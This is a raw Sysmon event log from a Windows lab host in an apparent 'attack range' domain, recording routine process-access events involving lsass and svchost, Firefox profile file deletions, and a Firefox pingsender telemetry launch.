10:33:47.966{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284621Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:47.966{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284620Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:47.966{C8EA50B7-F11D-6215-0B00-000000003802}628792C:\Windows\system32\lsass.exe{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+1b8ad|C:\Windows\system32\lsasrv.dll+2878b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284619Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:47.966{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284618Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:47.919{C8EA50B7-F11D-6215-0B00-000000003802}628792C:\Windows\system32\lsass.exe{C8EA50B7-0D8B-6216-8E04-000000003802}2268C:\Program Files\Mozilla Firefox\pingsender.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284617Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:47.919{C8EA50B7-F11D-6215-0B00-000000003802}628792C:\Windows\system32\lsass.exe{C8EA50B7-0D8B-6216-8E04-000000003802}2268C:\Program Files\Mozilla Firefox\pingsender.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284616Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:47.919{C8EA50B7-F11F-6215-0D00-000000003802}888916C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+f8c6|c:\windows\system32\rpcss.dll+1255a|c:\windows\system32\rpcss.dll+77ac|C:\Windows\System32\RPCRT4.dll+6a428|C:\Windows\System32\RPCRT4.dll+2ef79|C:\Windows\System32\RPCRT4.dll+2ed93|C:\Windows\System32\RPCRT4.dll+142d4|C:\Windows\System32\RPCRT4.dll+14751|C:\Windows\System32\RPCRT4.dll+11a1d|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284615Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:47.919{C8EA50B7-F11F-6215-0D00-000000003802}888916C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+f8c6|c:\windows\system32\rpcss.dll+1255a|c:\windows\system32\rpcss.dll+77ac|C:\Windows\System32\RPCRT4.dll+6a428|C:\Windows\System32\RPCRT4.dll+2ef79|C:\Windows\System32\RPCRT4.dll+2ed93|C:\Windows\System32\RPCRT4.dll+142d4|C:\Windows\System32\RPCRT4.dll+14751|C:\Windows\System32\RPCRT4.dll+11a1d|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284614Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:47.919{C8EA50B7-F11F-6215-0D00-000000003802}888916C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+f8c6|c:\windows\system32\rpcss.dll+1255a|c:\windows\system32\rpcss.dll+77ac|C:\Windows\System32\RPCRT4.dll+6a428|C:\Windows\System32\RPCRT4.dll+2ef79|C:\Windows\System32\RPCRT4.dll+2ed93|C:\Windows\System32\RPCRT4.dll+142d4|C:\Windows\System32\RPCRT4.dll+14751|C:\Windows\System32\RPCRT4.dll+11a1d|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284613Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:47.919{C8EA50B7-F11F-6215-0D00-000000003802}888916C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+f8c6|c:\windows\system32\rpcss.dll+1255a|c:\windows\system32\rpcss.dll+77ac|C:\Windows\System32\RPCRT4.dll+6a428|C:\Windows\System32\RPCRT4.dll+2ef79|C:\Windows\System32\RPCRT4.dll+2ed93|C:\Windows\System32\RPCRT4.dll+142d4|C:\Windows\System32\RPCRT4.dll+14751|C:\Windows\System32\RPCRT4.dll+11a1d|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284612Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:47.919{C8EA50B7-F11F-6215-0D00-000000003802}888916C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+f8c6|c:\windows\system32\rpcss.dll+1255a|c:\windows\system32\rpcss.dll+77ac|C:\Windows\System32\RPCRT4.dll+6a428|C:\Windows\System32\RPCRT4.dll+2ef79|C:\Windows\System32\RPCRT4.dll+2ed93|C:\Windows\System32\RPCRT4.dll+142d4|C:\Windows\System32\RPCRT4.dll+14751|C:\Windows\System32\RPCRT4.dll+11a1d|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284611Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:47.882{C8EA50B7-F11F-6215-1500-000000003802}1092100C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+6124|c:\windows\system32\cryptsvc.dll+5e34|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284610Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:47.835{C8EA50B7-F11F-6215-1000-000000003802}364764C:\Windows\system32\svchost.exe{C8EA50B7-0D8B-6216-8F04-000000003802}5156C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284609Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:47.835{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-0D8B-6216-8F04-000000003802}5156C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284608Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:47.820{C8EA50B7-0D8B-6216-8F04-000000003802}51563244C:\Windows\system32\conhost.exe{C8EA50B7-0D8B-6216-8E04-000000003802}2268C:\Program Files\Mozilla Firefox\pingsender.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000284607Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:47.820{C8EA50B7-0169-6216-B402-000000003802}4248ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\datareporting\glean\db\data.safe.binMD5=92EB96F584A7057DBF667877AAE18867,SHA256=F36DB29B6900A7B392B2856F3758944EF15A3DC2FB1CF4C514624F043CFEE90C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000284606Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:47.804{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-0D8B-6216-8F04-000000003802}5156C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 23542300x8000000000000000284605Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:47.804{C8EA50B7-0169-6216-B402-000000003802}4248ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\datareporting\glean\db\data.safe.binMD5=EF09B4E57671E707683DE7EF899B69A6,SHA256=1499ABA0A57C7745C0E574A6E415C5CEF9636504DC6E4F1696DF4F787D8C0479,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000284604Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:47.804{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284603Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:47.804{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284602Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:47.804{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284601Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:47.804{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284600Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:47.804{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-0D8B-6216-8E04-000000003802}2268C:\Program Files\Mozilla Firefox\pingsender.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000284599Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:47.804{C8EA50B7-0169-6216-B402-000000003802}42485616C:\Program Files\Mozilla Firefox\firefox.exe{C8EA50B7-0D8B-6216-8E04-000000003802}2268C:\Program Files\Mozilla Firefox\pingsender.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Mozilla Firefox\xul.dll+2195b7f|C:\Program Files\Mozilla Firefox\xul.dll+2195995|C:\Program Files\Mozilla Firefox\xul.dll+21959e1|C:\Program Files\Mozilla Firefox\xul.dll+1f97402|C:\Program Files\Mozilla Firefox\xul.dll+1a149ae|C:\Program Files\Mozilla Firefox\xul.dll+1a160f2|C:\Program Files\Mozilla Firefox\xul.dll+1bde499|C:\Program Files\Mozilla Firefox\xul.dll+179ae0c|C:\Program Files\Mozilla Firefox\xul.dll+13b7d2|C:\Program Files\Mozilla Firefox\xul.dll+154551e|UNKNOWN(000001D1D5754AA0) 154100x8000000000000000284598Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:47.808{C8EA50B7-0D8B-6216-8E04-000000003802}2268C:\Program Files\Mozilla Firefox\pingsender.exe97.0.1-FirefoxMozilla Foundationpingsender.exe"C:\Program Files\Mozilla Firefox\pingsender.exe" https://incoming.telemetry.mozilla.org/submit/telemetry/1868edc7-c857-4cda-bf8d-c3c683167443/event/Firefox/97.0.1/release/20220216172458?v=4 C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\saved-telemetry-pings\1868edc7-c857-4cda-bf8d-c3c683167443 https://incoming.telemetry.mozilla.org/submit/telemetry/7a931ddd-ad59-42aa-8f07-8e0b9ff26739/main/Firefox/97.0.1/release/20220216172458?v=4 C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\saved-telemetry-pings\7a931ddd-ad59-42aa-8f07-8e0b9ff26739C:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32MediumMD5=02AB913D3540422BFA0A676B861403F0,SHA256=9C14E91757BD1A4F8F2AC4B3F9D6294A8250C8DA03A110D358A6C785B56A273A,IMPHASH=AF27FA7223A9B6FE80447A0E6715E632{C8EA50B7-0169-6216-B402-000000003802}4248C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" 23542300x8000000000000000284597Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:47.804{C8EA50B7-0169-6216-B402-000000003802}4248ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\datareporting\aborted-session-pingMD5=ACC81F4E82D7168A6C94A58AAF0D5E91,SHA256=7DC13A04E37A10229BE461C7966ABEF55B25379F13034B09D98CD7274DB82685,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284596Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:47.751{C8EA50B7-0169-6216-B402-000000003802}4248ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\storage.sqlite-journalMD5=96BB172370367CCA60870763CC50221A,SHA256=C5799C3480BF879AB36EC359CE2D34F31B2C6F80568EB4E4B303165F6895EEBB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284595Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:47.735{C8EA50B7-0169-6216-B402-000000003802}4248ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-walMD5=04792AB6DB83E2AD3CA851DDA7DB1E3C,SHA256=4ADA47CC311C530BE18868F0D452AAD291A45F6743C39872FE9F7561127DAA5A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284594Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:47.735{C8EA50B7-0169-6216-B402-000000003802}4248ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shmMD5=4B69EABCB44AE2CB38D074D2F5BF014B,SHA256=C886DDB107FC27A4F7323D45D5FC6CA9D22210E29412A78E35F2A0F339F04A04,IMPHASH=00000000000000000000000000000000falsetrue 